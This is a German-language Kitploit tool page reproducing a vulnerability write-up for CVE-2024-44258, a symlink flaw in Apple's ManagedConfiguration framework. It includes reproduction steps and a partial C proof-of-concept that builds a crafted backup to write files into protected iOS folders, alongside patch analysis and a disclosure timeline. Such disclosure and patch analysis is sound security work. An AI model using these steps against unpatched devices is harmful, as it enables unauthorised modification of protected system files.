Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-44258 — CVE-2024-44258 | Kitploit
Tools/GitHubGitHub/ifpdz/cve-2024-44258
Privilege EscalationiOS-SicherheitSchwachstellenanalyseExploitationPost-ExploitationMobile Sicherheit
GitHubifpdz/cve-2024-44258

CVE-2024-44258

CVE-2024-44258

Repository anzeigen
8914vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-44258: Symlink-Schwachstelle im ManagedConfiguration-Framework

Zusammenfassung

CVE-2024-44258 hebt eine Symlink-Schwachstelle im ManagedConfiguration-Framework und dem profiled-Daemon auf Apple-Geräten hervor. Beim Wiederherstellen eines manipulierten Backups wird im Migrationsprozess nicht überprüft, ob der Zielordner ein symbolischer Link (Symlink) ist, was zu einer unbefugten Dateimigration in geschützte Bereiche führt.


CVE-ID

CVE-2024-44258 wurde dieser Sicherheitslücke zugewiesen. CVEs sind eindeutige Kennungen für öffentlich bekannt gegebene Sicherheitslücken.

  • Auswirkung: Das Wiederherstellen einer böswillig erstellten Backup-Datei kann zur Änderung geschützter Systemdateien führen.
  • Beschreibung: Dieses Problem wurde durch eine verbesserte Behandlung von Symlinks in den betroffenen Komponenten behoben.

Weitere Informationen finden Sie auf den offiziellen Support-Seiten von Apple:

  • support.apple.com/de-de/121569
  • support.apple.com/de-de/121566
  • support.apple.com/de-de/121563

Details

Betroffene Komponenten:

  • ManagedConfiguration-Framework
  • profiled-Daemon

Auswirkung:

Die Schwachstelle ermöglicht es Angreifern, symbolische Links während einer Backup-Wiederherstellung auszunutzen, um Ordnerbeschränkungen zu umgehen und Dateien in sandboxed oder geschützte Bereiche zu schreiben. Dieser Fehler kann potenziell unbefugten Datenzugriff, Privilegieneskalation oder die Ausnutzung anderer Dienste ermöglichen, die von der geänderten Konfiguration abhängen.


Schritte zur Reproduktion

  1. Erstellen eines manipulierten Backups

    • Erstellen Sie einen Symlink von:
      /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/
      zu einem sandboxed Ordner unter Verwendung der Domain:
      root@kitploit:~
      SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles
      
  2. Gewünschte Dateien hinzufügen

    • Fügen Sie Dateien und Ordner ein in:
      /private/var/mobile/Library/ConfigurationProfiles
      unter Verwendung der HomeDomain.
  3. Das manipulierte Backup wiederherstellen

    • Stellen Sie das Backup auf einem iPhone, iPod oder iPad wieder her.
  4. Gerät neu starten

    • Überprüfen Sie nach dem Neustart den Inhalt des geschützten Bereichs. Sie werden feststellen, dass die Dateien/Ordner an einen zuvor geschützten Ort migriert wurden.

Erwartetes vs. tatsächliches Ergebnis

  • Erwartet:
    /private/var/mobile/Library/ConfigurationProfiles sollte migriert werden nach:
    /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/

  • Tatsächlich:
    Aufgrund des manipulierten Symlinks werden die Dateien in einen geschützten Ordner migriert, der sensible oder geschützte Daten enthalten kann.


Exploit-Status

Diese Schwachstelle wurde mehrere Monate lang in freier Wildbahn beobachtet, was auf eine aktive Ausnutzung hindeutet.


Patch-Erklärung

In iOS 18.1 beta5 hat Apple einen Patch eingeführt, der die Symlink-Schwachstelle im ManagedConfiguration-Framework behebt. Die Funktion _MCDestinationPathIsSafeFromSymlinkAttacks wurde hinzugefügt, um eine Sicherheitsprüfung des Zielpfads durchzuführen und eine unbefugte Dateimigration in geschützte Bereiche zu verhindern. Diese Prüfung wurde speziell in die Funktion MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error: eingefügt.


Betroffene Funktion: -[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:]

Der Fix der Sicherheitslücke wurde durch Änderung der Funktion -[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:] implementiert, die für die Verwaltung von Dateimigrationen im ManagedConfiguration-Framework verantwortlich ist. So funktioniert der Patch:

  • Hinzufügen einer Symlink-Prüfung
    Apple hat einen Aufruf von _MCDestinationPathIsSafeFromSymlinkAttacks am Anfang von MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error: hinzugefügt. Diese Funktion prüft nun, ob der Zielpfad frei von symbolischen Links ist, und fügt eine Schutzschicht hinzu, bevor eine Migration durchgeführt wird.

  • Bedingungsprüfung
    Wenn _MCDestinationPathIsSafeFromSymlinkAttacks einen Symlink im Zielpfad erkennt, wird die Migration verhindert. Die Funktion protokolliert eine Fehlermeldung mittels OS_LOG_TYPE_FAULT und bricht frühzeitig ab, wodurch der Dateivorgang gestoppt wird.


Code-Vergleich

Mit Diaphora in IDA zeigt ein Diff-Vergleich zwischen iOS 18.1 beta4 und iOS 18.1 beta5 die Änderungen in der Funktion -[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:]. Das folgende Bild zeigt den modifizierten Code mit der hinzugefügten Symlink-Prüfung.

Patch-Vergleich


PoC (Proof of Concept)

Nachfolgend ein Code-Beispiel, das zeigt, wie ein Backup erstellt werden kann, das die Schwachstelle ausnutzt. Dieser Code skizziert, wie ein Symlink und Dateien zum Backup hinzugefügt werden, und simuliert den Prozess, ohne die eigentliche manipulierte Backup-Datei bereitzustellen.

root@kitploit:~
unsigned char* plist_data = NULL;
        file_read("/path/to/your/test-outofsandbox.plist", &plist_data, &plist_size); // DIES MUSS AN DEN DATEIPFAD ANGEPASST WERDEN

    backup_add_directory(backup, "HomeDomain", "Library/ConfigurationProfiles", 0755, 501, 501);
    backup_add_file_with_data(backup, "HomeDomain", "Library/ConfigurationProfiles/test.plist", 0755, 501, 501, 4, plist_data, plist_size); // WIR FÜGEN UNSERE DATEIEN HINZU
         
    backup_add_directory(backup, "SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles", NULL, 0755, 501, 501);
    backup_add_symlink(backup, "SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles", "Library", "/private/var/mobile/Library", 501, 501); // ÄNDERN SIE DEN PFAD ZU DEM SANDBOXED ORDNER, IN DEN SIE IHRE DATEIEN SCHREIBEN MÖCHTEN
    
    backup_write_mbdb(backup); // BACKUP SPEICHERN
    backup_free(backup);

Offenlegungszeitplan

  • Erstmeldung an Apple: [06.07.2024]
  • CVE zugewiesen: CVE-2024-44258
  • Öffentliche Offenlegung: [02.11.2024]

Danksagungen

Besonderer Dank gilt dem Apple-Sicherheitsteam für seine schnelle Reaktion und Zusammenarbeit.

Schwachstelle entdeckt von Hichem Maloufi & Christian Mina


Lizenz

Dieses Repository ist unter der MIT-Lizenz lizenziert. Weitere Informationen finden Sie in der LICENSE.

Tool herunterladen